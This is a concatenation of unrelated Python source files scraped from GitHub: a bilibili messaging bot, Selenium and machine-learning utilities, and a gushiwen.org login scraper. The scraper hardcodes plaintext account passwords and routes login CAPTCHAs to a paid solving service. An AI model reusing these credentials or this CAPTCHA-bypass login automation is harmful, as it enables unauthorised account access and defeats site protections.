425ebe69aa5703cc003e1e43174d4dd80677a7af | d494098417cafaf8bbf97965b2e2adc5aae2ccf9 | /app.py | d20c2f6f8c3296d8a802f46c51e80d542f0f9253 | [] | no_license | HynemanKan/bilibiliAnimateBot | 51cb96182ce99fe4974ae0cbd8d4dbd76993a62a | 9db4d742f1cecdb32cd477ac206c28334d3d71f5 | refs/heads/master | 2022-12-19T07:14:17.154558 | 2020-09-18T05:45:30 | 2020-09-18T05:45:30 | 296,521,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,551 | py | import json,time,random
import requests
import requests.utils
from flask import Flask,render_template,request,redirect
import db,support
from background import scheduler
# Browser-like User-Agent sent with every bilibili request — presumably to
# avoid UA-based blocking of the default python-requests agent (confirm).
headers={
    "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
}
# Flask application object used by all route decorators below.
app = Flask(__name__)
def startBackground():
    """Ensure the background scheduler is active; always returns True.

    Treats state 1 as already running (no-op), state 0 as never started
    (start it), and anything else as paused (resume it).
    """
    state = scheduler.state
    if state == 0:
        scheduler.start()
    elif state != 1:
        scheduler.resume()
    return True
@app.route("/")
def index():
if not db.redisdb.exists("bilibili_msg_poster_cookies"):
return render_template("index.html")
else:
startBackground()
return redirect("/state")
@app.route("/state")
def state():
return "<h1>success</h1>"
@app.route('/api/v1/login.json')
def get_login_qr():
    # Request a bilibili QR-login URL; the paired oauthKey is cached in redis
    # for 180s so /api/v1/loginState.json can poll for completion.
    if not db.redisdb.exists("bilibili_msg_poster_cookies"):
        url = "https://passport.bilibili.com/qrcode/getLoginUrl"
        data = requests.get(url,headers=headers).json()
        qr_code_url = data["data"]["url"]
        db.redisdb.set("bilibili_msg_poster_login_auth",data["data"]["oauthKey"],180)
        return json.dumps({
            "state":0,
            "data":{
                "qr_url":qr_code_url,
                "timeout":180
            }
        })
    else:
        # cookies already cached -> already logged in
        return json.dumps({
            "state": -1,
            "msg": "login already"
        })
@app.route("/background")
def background_state():
print(scheduler.state)
return str(scheduler.state)
@app.route("/api/v1/loginState.json")
def get_login_state():
if not db.redisdb.exists("bilibili_msg_poster_cookies"):
if db.redisdb.exists("bilibili_msg_poster_login_auth"):
auth = db.redisdb.get("bilibili_msg_poster_login_auth")
url = "https://passport.bilibili.com/qrcode/getLoginInfo"
raw_data = requests.post(url,{
"oauthKey":auth
},headers=headers)
data = raw_data.json()
if isinstance(data["data"],int):
loginState = data["data"]
else:
support.set_cookies(raw_data.cookies)
url = "https://api.bilibili.com/nav"
data = requests.get(url, cookies=raw_data.cookies,headers=headers)
data = data.json()
db.redisdb.set("bilibili_msg_poster_uid", data["data"]["mid"])
db.redisdb.set("bilibili_msg_poster_face_url", data["data"]["face"])
startBackground()
loginState = 0
return json.dumps({
"state": 0,
"data": {
"login_state":loginState,
}
})
else:
return json.dumps({
"state": -1,
"msg":"try login First"
})
else:
return json.dumps({
"state": 0,
"data": {
"login_state": 0,
}
})
@app.route("/api/v1/getNums.json")
@support.login_required
def getNums():
url = "https://api.bilibili.com/x/relation/stat?vmid={}"
uid = db.redisdb.get("bilibili_msg_poster_uid")
targetUrl=url.format(uid)
cookies = support.get_cookies()
data={}
print(targetUrl)
res = requests.get(targetUrl,cookies=cookies,headers=headers).json()
print(res)
data["follower"]=res["data"]["follower"]
url = "http://api.bilibili.com/x/space/upstat?mid={}"
targetUrl=url.format(uid)
res = requests.get(targetUrl, cookies=cookies,headers=headers).json()
data["videoView"]= res["data"]["archive"]["view"]
data["articleView"]=res["data"]["article"]["view"]
data["like"] = res["data"]["likes"]
return json.dumps({
"state":0,
"data":data
})
@app.route("/api/v1/getSelfInfo.json")
@support.login_required
def getSelfInfo():
url = "https://api.bilibili.com/nav"
cookies_jar = support.get_cookies()
res = requests.get(url,cookies=cookies_jar,headers=headers)
support.set_cookies(res.cookies)
data = res.json()
return json.dumps(data)
def gen_id():
    """Random UUID4-style device id for the web IM API.

    Note the deliberately odd alphabet ("...ACBDEF") — kept as-is to match
    the original generator's output distribution.
    """
    alphabet = "0123456789ACBDEF"

    def fill(slot):
        roll = int(16 * random.random())
        if slot == "x":
            return alphabet[roll]
        if slot == "y":
            # variant nibble: low 2 bits of the roll, high bit forced on
            return alphabet[roll & 3 | 8]
        return slot

    return "".join(fill(c) for c in "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx")
@app.route("/api/v1/send_text_msg.json",methods=["POST"])
@support.login_required
def send_text_msg():
receiver_id = request.form["receiver_id"]
msg_content = request.form["msg_content"]
uid = db.redisdb.get("bilibili_msg_poster_uid")
cookies_jar = support.get_cookies()
url = "https://api.vc.bilibili.com/web_im/v1/web_im/send_msg"
data = {
"msg[sender_uid]":uid,
"msg[receiver_id]":receiver_id,
"msg[receiver_type]":1,
"msg[msg_type]":1,
"msg[msg_status]":0,
"msg[content]": json.dumps({
"content":msg_content
}),
"msg[timestamp]":int(time.time()),
"msg[dev_id]":gen_id(),
"build":0,
"mobi_app":"web",
"csrf_token":support.get_cookies_value("bili_jct")
}
res = requests.post(url,data,cookies=cookies_jar,headers=headers).json()
return json.dumps(res)
@app.route("/api/v1/send_msg.json",methods=["POST"])
@support.login_required
def send_msg():
receiver_id = request.form["receiver_id"]
msg_type = request.form["msg_type"]
uid = db.redisdb.get("bilibili_msg_poster_uid")
msg = request.form["msg"]
cookies_jar = support.get_cookies()
url = "https://api.vc.bilibili.com/web_im/v1/web_im/send_msg"
data = {
"msg[sender_uid]":uid,
"msg[receiver_id]":receiver_id,
"msg[receiver_type]":1,
"msg[msg_type]":msg_type,
"msg[msg_status]":0,
"msg[content]":msg,
"msg[timestamp]":int(time.time()),
"msg[dev_id]":gen_id(),
"build":0,
"mobi_app":"web",
"csrf_token":support.get_cookies_value("bili_jct")
}
res = requests.post(url,data,cookies=cookies_jar,headers=headers).json()
return json.dumps(res)
@app.route("/logout")
@support.login_required
def logout():
db.redisdb.delete("bilibili_msg_poster_cookies")
return "logout"
if __name__ == '__main__':
db.redisdb.flushall()
db.cursor.execute("delete from followings")
db.mysql.commit()
app.run("0.0.0.0",8080)
| [
"kxkxkxkx1214@outlook.com"
] | kxkxkxkx1214@outlook.com |
f0df7e8e93677297d690aea3885242627f116bec | 07b6716938f05577a4f8df0b1eed71136c45fb45 | /practice/UpadteInformation/LoginPublicMethods.py | 7a73ee68b514163d53ad9958f3e5780aff2c8e7c | [] | no_license | caotya/selenium7th_1 | a7e0f3292eeefb515769063ff303a880b86716bf | 7ffe69e5b8f46a42ad13aeab73c7d0bea54af756 | refs/heads/master | 2020-03-21T19:43:48.321999 | 2018-06-28T04:36:43 | 2018-06-28T04:36:43 | 138,966,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
class Login:
def LoginPublicMethods(self,driver):
driver.get("http://localhost/")
driver.implicitly_wait(20)
login_target = driver.find_element_by_link_text("登录")
driver.execute_script("arguments[0].removeAttribute('target')", login_target)
login_target.click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("cty")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123456").send_keys(Keys.ENTER).perform() | [
"1404536614@qq.com"
] | 1404536614@qq.com |
fb63ffd2d7635ad3c0aa46d996addf69e3546d0f | f4b362f6b5b5b58ada5366dccf926ce23f61d3e7 | /small.py | a9d75b1cf2dcfbc2fff4a0d035928d04f9827208 | [] | no_license | nutristar/lessons_pro | eb6beae6222b5b0e36b23f9961ccd8a7ffeb584d | ddae845f31fb63d990f9e853fbbc6ff2ea6d3320 | refs/heads/master | 2022-02-07T11:10:19.668397 | 2019-02-03T22:39:26 | 2019-02-03T22:39:26 | 173,500,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | x=1
y=[2,3]
| [
"deniszmail@gmail.com"
] | deniszmail@gmail.com |
68c72262983dd408118feeb106edd957dae536c8 | 76820d80627dc4f431017ce69184fd2630f96e84 | /Clientes[CodigoLegado]/business/control/Commands/ComandoVerificaSenha.py | a4484cc23c4395618ff384130def1dded0ab359e | [] | no_license | douglasliralima/Beak | 1b3526b2585c772864aa33a0a10dd7ca4effa4f4 | 8a494afdb6c7e23ceacc8f12f69dabaadde73206 | refs/heads/master | 2023-01-07T21:01:08.097637 | 2019-10-02T01:28:19 | 2019-10-02T01:28:19 | 175,688,966 | 0 | 0 | null | 2023-01-04T10:44:40 | 2019-03-14T19:47:12 | HTML | UTF-8 | Python | false | false | 240 | py | from business.control.Commands.Comando import Comando
class comando_verifica_senha(Comando):
def __init__(self, verifica_cliente):
self.__cliente_validado = verifica_cliente
def executa(self):
self.__cliente_validado.valida_senha() | [
"douglasliralima@gmail.com"
] | douglasliralima@gmail.com |
355e1dafe9411709137e69f5fff64559073d4090 | cf10924f40f84e9b2a990e0964d90223ddfce9a3 | /PY/analize.py | 27dc3833131132106f06297e0c225acd074aa441 | [] | no_license | jayc37/site | 03212eba0f2b0a85415b88933b98d8eb6e6f75b4 | eac243a8ce43de1e704e16ae49043da2031a1c2d | refs/heads/master | 2023-01-19T20:44:18.108549 | 2020-11-21T04:55:16 | 2020-11-21T04:55:16 | 314,528,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | import numpy as np
import pandas as pd
from oddeven import isEven,val1,val2
def analize(_dict):
_d = _dict['rates']
_index = get_keys(_d)
_values = get_val(_d)
dataSet = odd_even(_index,_values)
return _index,dataSet
def odd_even(_index,_value):
dataSet = {}
for i in range(len(_index)):
idx = _index[i]
vl1 = _value[i]
_inc = 10.0002
t = getlistIndex1(vl1)
_ls =getlistIndex2(t,vl1,_inc)
dataSet[idx] = _ls
return dataSet
def getlistIndex1(vl1):
_temp = []
if (isEven(str(vl1))):
_value1 = val1(vl1,'Even')
_temp.append(_value1)
else :
_value1 = val1(vl1,'Odd')
_temp.append(_value1)
return _temp
def getlistIndex2(_temp,vl,number):
vl2 = vl + number
if (isEven(str(vl2))):
_value2 = val2(vl2,'Even')
_temp.append(_value2)
else :
_value2 = val2(vl2,'Odd')
_temp.append(_value2)
return _temp
def get_keys(_dict):
return list(_dict.keys())
def get_val(_dict):
return list(_dict.values())
# This code is contributed
# by Nikita Tiwari. | [
"son.tran@phattien.local"
] | son.tran@phattien.local |
31360d3f126b1d2754f6f77c0e7e2f772b35e62f | aeb4b69cd7f6aea6a15336be8b869956fbe00726 | /Model.py | d17fcf417c837792e9e42a5dccc92b7e4119f0b0 | [] | no_license | gandharvsuri/Toxic-Comment-Classification | 0c18966414a5c9a57d2cae3a1c1fd7ee53ce6530 | 5c2347f7d22b2ec8b05c22e73f5f2bc77f681025 | refs/heads/master | 2020-08-23T06:06:09.923296 | 2020-05-23T09:44:29 | 2020-05-23T09:44:29 | 216,558,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,422 | py |
# Required library imports
import numpy as np
import pandas as pd
from skmultilearn.problem_transform import ClassifierChain
from sklearn.linear_model import LogisticRegression
from skmultilearn.problem_transform import LabelPowerset
from imblearn.ensemble import EasyEnsembleClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import learning_curve
from sklearn.feature_selection import SelectFromModel
from sklearn.ensemble import VotingClassifier
from sklearn.externals import joblib
from features_extraction import get_features
class_names = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
def pr(y_i, y,train_features):
p = train_features[y==y_i].sum(0)
return (p+1) / ((y==y_i).sum()+1)
def EasyEnsembleClassfier(data,test_data):
train_text = data['comment_text'].values.astype(str)
test_text = test_data['comment_text'].values.astype(str)
all_text = np.concatenate([train_text, test_text])
train_features,test_features = get_features(train_text,test_text,all_text)
submission = pd.DataFrame.from_dict({'Id': test_data['id']})
for class_name in class_names:
train_target = data[class_name]
y = train_target.values
r = np.log(pr(1,y,train_features) / pr(0,y,train_features))
x_nb = train_features.multiply(r)
l = EasyEnsembleClassifier(base_estimator=LogisticRegression(C=2, solver='sag', max_iter=500))
n = EasyEnsembleClassifier(base_estimator=SGDClassifier(alpha=.0002, max_iter=180, penalty="l2", loss='modified_huber'))
o = LogisticRegression(C=2, dual=True, max_iter=500)
p = RandomForestClassifier(criterion='gini',
max_depth=100, max_features=1000, max_leaf_nodes=None, min_samples_split=10,
min_weight_fraction_leaf=0.0, n_estimators=80)
m = VotingClassifier(estimators=[ ('lr', l), ('sgd', n),('lr1',o),('rdf',p)], voting='soft', weights=[0.9,1.35,0.65,0.8])
m.fit(x_nb, y)
submission[class_name] = m.predict_proba(test_features.multiply(r))[:, 1]
submission.to_csv('EnsembleClassfierSubmission_2.csv', index=False)
joblib.dump(m,'Ensemble.pkl')
if __name__ == "__main__":
data = pd.read_csv('./Data/ppc_train.csv')
test_data = pd.read_csv('./Data/ppc_test.csv')
EasyEnsembleClassfier(data,test_data) | [
"gandharv.suri@iiitb.org"
] | gandharv.suri@iiitb.org |
bc74602fe4e6cba46dc8330e664a6ecb75db54e6 | d50ba91c7614f2fa07e0235adb933bbececafaa6 | /limix/ensemble/lmm_forest_utils.py | bd313a82336bade3257e3686e792b17c8bffeec0 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlmaccal/limix | 59c3154e8fc543068da17677e51f513423fbca54 | 8029d3df3883bd2043c449e5d8f4da6a7936dc32 | refs/heads/master | 2020-12-30T20:50:18.680123 | 2016-04-14T21:19:36 | 2016-04-14T21:19:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,440 | py | import scipy as SP
import par_lmm_forest as parUtils
import random
def checkMaf(X, maf=None):
if maf==None:
maf = 1.0/X.shape[0]
Xmaf = (X>0).sum(axis=0)
Iok = (Xmaf>=(maf*X.shape[0]))
return SP.where(Iok)[0]
def scale_K(K, verbose=False):
"""scale covariance K such that it explains unit variance"""
c = SP.sum((SP.eye(len(K)) - (1.0 / len(K)) * SP.ones(K.shape)) * SP.array(K))
scalar = (len(K) - 1) / c
if verbose:
print 'Kinship scaled by: %0.4f' % scalar
K = scalar * K
return K
def update_Kernel(unscaled_kernel, X_upd_in, scale=True):
#filter and scale SNPs
X_upd = X_upd_in.copy()
X_upd = X_upd[:,checkMaf(X_upd)]
X_upd -= X_upd.mean(axis=0)
X_upd /= X_upd.std(axis=0)
X_upd = X_upd.T
#update kernel
kernel_out = unscaled_kernel.copy()
kernel_out -= SP.dot(X_upd.T, X_upd)
if scale:
return scale_K(kernel_out)
else:
return kernel_out
def estimateKernel(X, msample=None, maf=None, scale=True):
#1. maf filter
Xpop = X.copy()
Xpop = Xpop[:,checkMaf(X, maf)]
#2. sampling of predictors
if msample != None:
msample = SP.random.permutation(X.shape[1])[:msample]
Xpop = Xpop[:,msample]
Xpop -= Xpop.mean(axis=0)
Xpop /= Xpop.std(axis=0)
Xpop = Xpop.copy().T
Xpop = SP.array(Xpop, dtype='float')
Kpop = SP.dot(Xpop.T,Xpop)
if scale:
return scale_K(Kpop)
else:
return Kpop
def k_fold_cross_validation(items, k, randomize=True, seed=True):
if randomize:
if seed:
random.seed(10) # make shure we get similar partitions across methods
items = list(items)
random.shuffle(items)
slices = [items[i::k] for i in xrange(k)]
for i in xrange(k):
validation = slices[i]
training = [item
for s in slices if s is not validation
for item in s]
yield validation
def crossValidationScheme(folds, n):
validationList = []
for validation in k_fold_cross_validation(range(n), folds):
indexes = SP.ones(n) == 0
indexes[validation] = True
validationList.append(indexes)
return validationList
def crossValidate(y, X, K=None, folds=3, model=None, returnModel=False):
errors = SP.empty(folds)
n = y.shape[0]
indexes = crossValidationScheme(folds,n)
predictions = SP.empty(y.shape)
alpha = []
alphas = []
msePath = []
for cvRun in SP.arange(len(indexes)):
testIndexes = indexes[cvRun]
yTrain = y[~testIndexes]
XTrain = X[~testIndexes]
if K == None:
model.fit(XTrain, yTrain)
prediction = SP.reshape(model.predict(X[testIndexes]), (-1,1))
else: # models having population structure
KTrain = K[~testIndexes]
KTrain = KTrain[:,~testIndexes]
KTest=K[testIndexes]
KTest=KTest[:,~testIndexes]
model.reset()
model.kernel = KTrain #TODO: make nice integration
model.fit(XTrain, yTrain)
prediction = SP.reshape(model.predict(X[testIndexes], k=KTest), (-1,1))
predictions[testIndexes] = prediction
errors[cvRun] = predictionError(y[testIndexes], prediction)
print 'prediction error right now is', errors[cvRun]
if returnModel:
alpha.append(model.alpha)
alphas.append(model.alphas)
msePath.append(model.mse_path)
if returnModel:
return indexes, predictions, errors, alpha, alphas, msePath
else:
return indexes, predictions, errors
def predictionError(yTest, yPredict):
return ((yTest - yPredict)**2).sum()/SP.float_(yTest.shape[0])
def getQuadraticKernel(X, d=.01):
K = SP.empty((X.shape[0], X.shape[0]))
for i in SP.arange(X.shape[0]):
for j in SP.arange(X.shape[0]):
K[i,j] = SP.exp(-0.5/d*(X[i]-X[j])**2)
return scale_K(K)
def generate_linear_data(n_max, n_step, ssv_g, var):
x = SP.arange(0,n_max,n_step).reshape(-1,1)
y = SP.zeros_like(x).reshape(-1,1)*0.0
X = convertToBinaryPredictor(x)
Xbg = (SP.random.rand(X.shape[0], X.shape[1]) < .5) * 1.0
weights = var*SP.random.randn(2,1)
y += X[:,3:4] * weights[0,:]
Xbg[:,3:4] = X[:,3:4]
l = X[:,1:2] * X[:,2:3]
Xbg[:,1:2] = X[:,1:2]
Xbg[:,2:3] = X[:,2:3]
y += l * weights[1,:]
yTr = y.copy()
ssv_v = 1.0-ssv_g
if ssv_g > 0.0:
ldelta = SP.log(ssv_v/SP.float_(ssv_g))
K = scale_K(getQuadraticKernel(x, d=20))
else:
ldelta = None
K = SP.eye(y.shape[0])
y += SP.random.multivariate_normal(SP.zeros(K.shape[0]),ssv_g*K+ssv_v*SP.eye(K.shape[0])).reshape(-1,1)
return Xbg, x, y, yTr, K, ldelta
def convertToBinaryPredictor(x):
arr = []
a = 0
for i in SP.arange(x.size):
arr.append(bin(x[i,0])[2:])
l = max(a, bin(x[i,0])[2:].__len__())
X = SP.zeros((x.size,l))
for i in SP.arange(x.size):
head0=l-arr[i].__len__()
for j in SP.arange(head0):
X[i,j] = 0
for j in SP.arange(arr[i].__len__()):
X[i,head0+j] = SP.int16(arr[i][j])
return X
# generates data sets to test the continous version of the mixed forest
def lin_data_cont_predictors(n=100, m=1):
X = SP.random.randn(n,m)
beta = SP.random.randn(m,1)
beta[1:]=0
y = SP.dot(X,beta)
return X, y
| [
"joh.stephan@gmail.com"
] | joh.stephan@gmail.com |
dc7ecb8fba15f6b0a0781b7296143b29b6ebe67e | 9bc81f51f1205b6b3476805ade30937923f658fa | /gushiwen.py | 2722a99b84189b78b539b1422995aa246c494beb | [] | no_license | JoyMichele/spider | 4229d2a38d0250da45008231de2e3fc6e9a007fd | 7427097082d854d8abe4a3a819eeba5220a38df9 | refs/heads/master | 2020-04-15T17:10:52.913231 | 2019-01-13T15:28:01 | 2019-01-13T15:28:01 | 164,864,337 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,516 | py |
# coding: utf-8
# In[3]:
import http.client, mimetypes, urllib, json, time, requests
######################################################################
class YDMHttp:
apiurl = 'http://api.yundama.com/api.php'
username = ''
password = ''
appid = ''
appkey = ''
def __init__(self, username, password, appid, appkey):
self.username = username
self.password = password
self.appid = str(appid)
self.appkey = appkey
def request(self, fields, files=[]):
response = self.post_url(self.apiurl, fields, files)
response = json.loads(response)
return response
def balance(self):
data = {'method': 'balance', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['balance']
else:
return -9001
def login(self):
data = {'method': 'login', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['uid']
else:
return -9001
def upload(self, filename, codetype, timeout):
data = {'method': 'upload', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'codetype': str(codetype), 'timeout': str(timeout)}
file = {'file': filename}
response = self.request(data, file)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['cid']
else:
return -9001
def result(self, cid):
data = {'method': 'result', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'cid': str(cid)}
response = self.request(data)
return response and response['text'] or ''
def decode(self, filename, codetype, timeout):
cid = self.upload(filename, codetype, timeout)
if (cid > 0):
for i in range(0, timeout):
result = self.result(cid)
if (result != ''):
return cid, result
else:
time.sleep(1)
return -3003, ''
else:
return cid, ''
def report(self, cid):
data = {'method': 'report', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'cid': str(cid), 'flag': '0'}
response = self.request(data)
if (response):
return response['ret']
else:
return -9001
def post_url(self, url, fields, files=[]):
for key in files:
files[key] = open(files[key], 'rb');
res = requests.post(url, files=files, data=fields)
return res.text
def get_code_text(codeType,imgPath):
# 用户名:普通用户
username = 'jilei761199418'
# 密码
password = 'lzjl95880'
# 软件ID,开发者分成必要参数。登录开发者后台【我的软件】获得!
appid = 6591
# 软件密钥,开发者分成必要参数。登录开发者后台【我的软件】获得!
appkey = '099869da9c97a826fa3afc8d8f4de224'
# 图片文件
filename = imgPath
# 验证码类型,# 例:1004表示4位字母数字,不同类型收费不同。请准确填写,否则影响识别率。在此查询所有类型 http://www.yundama.com/price.html
codetype = codeType
# 超时时间,秒
timeout = 15
# 检查
if (username == 'username'):
print('请设置好相关参数再测试')
else:
# 初始化
yundama = YDMHttp(username, password, appid, appkey)
# 登陆云打码
uid = yundama.login();
print('uid: %s' % uid)
# 查询余额
balance = yundama.balance();
print('balance: %s' % balance)
# 开始识别,图片路径,验证码类型ID,超时时间(秒),识别结果
cid, result = yundama.decode(filename, codetype, timeout);
#print('cid: %s, result: %s' % (cid, result))
return result
import requests
from lxml import etree
url = "https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
}
# 实例化一个session对象
session = requests.Session()
page_text = session.get(url=url, headers=headers).text
tree = etree.HTML(page_text)
# 拿到验证码 图片路径
code_src = "https://so.gushiwen.org" + tree.xpath('//*[@id="imgCode"]/@src')[0]
# 拿到验证码 图片 存到本地
img_data = session.get(url=code_src, headers=headers).content
with open("./gushiwen.jpg", "wb") as fp:
fp.write(img_data)
# 调用函数让云打码识别验证码图片 返回图片内容
code_text = get_code_text(1004,'./gushiwen.jpg')
print(code_text)
# 下面这两个很有可能是动态加载的,去前端页面发请求,然后搜索,发现这俩是在 隐藏输入框 中的value
__VIEWSTATE = tree.xpath('//*[@id="__VIEWSTATE"]/@value')[0]
__VIEWSTATEGENERATOR = tree.xpath('//*[@id="__VIEWSTATEGENERATOR"]/@value')[0]
# 登录的url
login_url = 'https://so.gushiwen.org/user/login.aspx?from=http%3a%2f%2fso.gushiwen.org%2fuser%2fcollect.aspx'
# post提交需要携带的数据
data = {
"__VIEWSTATE":__VIEWSTATE,
"__VIEWSTATEGENERATOR":__VIEWSTATEGENERATOR,
"from":"http://so.gushiwen.org/user/collect.aspx",
"email":"www.zhangbowudi@qq.com",
"pwd":"bobo328410948",
"code":code_text,
"denglu":"登录"
}
# 模拟登录 session提交请求 携带cookie (注意这里的session是能够发送请求的对象)
page_text = session.post(url=login_url, headers=headers, data=data).content
# 用写入的方式查看结果 更清晰
with open("./gushiwen.html", "wb") as fp:
fp.write(page_text)
| [
"761199418@qq.com"
] | 761199418@qq.com |
915825db78f4178b3a1f8f7a1ff368f65fd6b37a | 1526dda13d1f4867ac7624663f338c47879c2506 | /blog/admin.py | ae1c5f9fdd0befcd9e45f8ffb013f7f26f393059 | [] | no_license | sohyunki/blog | 5d6640b9f521bbf4a931a7c5b98549a148f4f6d6 | 292973e86cae68f82450e5ce6373390542c3e354 | refs/heads/master | 2023-05-28T04:37:41.048266 | 2021-06-18T19:40:42 | 2021-06-18T19:40:42 | 378,249,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | from django.contrib import admin
from blog.models import Write
admin.site.register(Write)
# Register your models here.
| [
"sohyunki"
] | sohyunki |
45ca5c8bfb465a46b8277775fae7b5875bf981ff | 371dcd051dfb93dd946455225448b02a80d1cd0a | /constant/rgapi.py | 20fb535b2d36db98cfeb859054b75136d9d9dd89 | [
"MIT"
] | permissive | iElden/EldenBot | 7a5a042269d2540d87ac84f57441ddfcdf05ad12 | e8ab08f1071dc9c3d77e51c1778469b6115ec5cf | refs/heads/master | 2023-04-02T01:04:32.284979 | 2023-03-22T17:24:09 | 2023-03-22T17:24:09 | 128,685,082 | 1 | 6 | MIT | 2022-05-06T19:16:10 | 2018-04-08T21:55:41 | Python | UTF-8 | Python | false | false | 11,687 | py | CHAMP_ID_TO_EMOJI = {'266': '<:champ_266:601909182748164097>', '103': '<:champ_103:601909185243774976>', '84': '<:champ_84:601909188612063233>', '12': '<:champ_12:601909190809878530>', '32': '<:champ_32:601909193456222221>', '34': '<:champ_34:601909195968610356>', '1': '<:champ_1:601909198799896690>', '22': '<:champ_22:601909201564073984>', '136': '<:champ_136:601909204034387986>', '268': '<:champ_268:601909206337191937>', '432': '<:champ_432:601909209348571136>', '53': '<:champ_53:601909212175663129>', '63': '<:champ_63:601909215262408705>', '201': '<:champ_201:601909218072592406>', '51': '<:champ_51:601909220664672275>', '164': '<:champ_164:601909222455640094>', '69': '<:champ_69:601909224213053481>', '31': '<:champ_31:601909227174494208>', '42': '<:champ_42:601909229246218250>', '122': '<:champ_122:601909231268134933>', '131': '<:champ_131:601909232954245122>', '119': '<:champ_119:601909235831406759>', '36': '<:champ_36:601909237928689714>', '245': '<:champ_245:601909241250578462>', '60': '<:champ_60:601909243112718355>', '28': '<:champ_28:601909244823863309>', '81': '<:champ_81:601909247458148353>', '9': '<:champ_9:601909250234646746>', '114': '<:champ_114:601909252642045964>', '105': '<:champ_105:601909255259291648>', '3': '<:champ_3:601909257067298865>', '41': '<:champ_41:601909258963124225>', '86': '<:champ_86:601909261915783188>', '150': '<:champ_150:601909264533028932>', '79': '<:champ_79:601909267032702989>', '104': '<:champ_104:601909269520056352>', '120': '<:champ_120:601909272825298944>', '74': '<:champ_74:601909276398714921>', '420': '<:champ_420:601909278105665588>', '39': '<:champ_39:601909281687732317>', '427': 
'<:champ_427:601909283675963402>', '40': '<:champ_40:601909286418907137>', '59': '<:champ_59:601909288994340933>', '24': '<:champ_24:601909292534071327>', '126': '<:champ_126:601909294975287325>', '202': '<:champ_202:601909297974083605>', '222': '<:champ_222:601909300687929355>', '145': '<:champ_145:601909302814310437>', '429': '<:champ_429:601909305662504981>', '43': '<:champ_43:601909308183150592>', '30': '<:champ_30:601909340571566080>', '38': '<:champ_38:601909342756929557>', '55': '<:champ_55:601909345663582273>', '10': '<:champ_10:601909347945283584>', '141': '<:champ_141:601909349471748112>', '85': '<:champ_85:601909351523024897>', '121': '<:champ_121:601909353540354061>', '203': '<:champ_203:601909356086296609>', '240': '<:champ_240:601909358258946048>', '96': '<:champ_96:601909360284663808>', '7': '<:champ_7:601909362222432266>', '64': '<:champ_64:601909364881883136>', '89': '<:champ_89:601909366802612236>', '127': '<:champ_127:601909370413907984>', '236': '<:champ_236:601909373194993698>', '117': '<:champ_117:601909375317311488>', '99': '<:champ_99:601909377959460885>', '54': '<:champ_54:601909383433027614>', '90': '<:champ_90:601909385614196767>', '57': '<:champ_57:601909388122390529>', '11': '<:champ_11:601909392623009793>', '21': '<:champ_21:601909395030409235>', '62': '<:champ_62:601909398578659358>', '82': '<:champ_82:601909401506414598>', '25': '<:champ_25:601909403448508437>', '267': '<:champ_267:601909406426333198>', '75': '<:champ_75:601909408628211715>', '111': '<:champ_111:601909410805055488>', '518': '<:champ_518:601909414118686752>', '76': '<:champ_76:601909416110981169>', '56': '<:champ_56:601909419189469185>', '20': '<:champ_20:601909421580484629>', '2': '<:champ_2:601909423983558668>', '61': '<:champ_61:601909426474975263>', '516': '<:champ_516:601909428958003212>', '80': '<:champ_80:601909431747346447>', '78': '<:champ_78:601909434142294086>', '555': '<:champ_555:601909436864397322>', '246': '<:champ_246:601909439876038676>', '133': 
'<:champ_133:601909442371387395>', '497': '<:champ_497:601909445253005335>', '33': '<:champ_33:601909447320797244>', '421': '<:champ_421:601909449850093579>', '58': '<:champ_58:601909452567871571>', '107': '<:champ_107:601909455478718491>', '92': '<:champ_92:601909458230050816>', '68': '<:champ_68:601909460482654208>', '13': '<:champ_13:601909462776676372>', '113': '<:champ_113:601909465624608777>', '35': '<:champ_35:601909468028207135>', '98': '<:champ_98:601909497539067924>', '102': '<:champ_102:601909500059975685>', '27': '<:champ_27:601909503205834764>', '14': '<:champ_14:601909506074607659>', '15': '<:champ_15:601909508129685504>', '72': '<:champ_72:601909510679953438>', '37': '<:champ_37:601909513066643456>', '16': '<:champ_16:601909515222253582>', '50': '<:champ_50:601909518082899972>', '517': '<:champ_517:601909520939089920>', '134': '<:champ_134:601909523493683213>', '223': '<:champ_223:601909526408724480>', '163': '<:champ_163:601909528652546070>', '91': '<:champ_91:601909531223654439>', '44': '<:champ_44:601909533727653918>', '17': '<:champ_17:601909535929794562>', '412': '<:champ_412:601909538701967370>', '18': '<:champ_18:601909541705089054>', '48': '<:champ_48:601909545056337960>', '23': '<:champ_23:601909548735004723>', '4': '<:champ_4:601909551637200898>', '29': '<:champ_29:601909555810795531>', '77': '<:champ_77:601909558604070961>', '6': 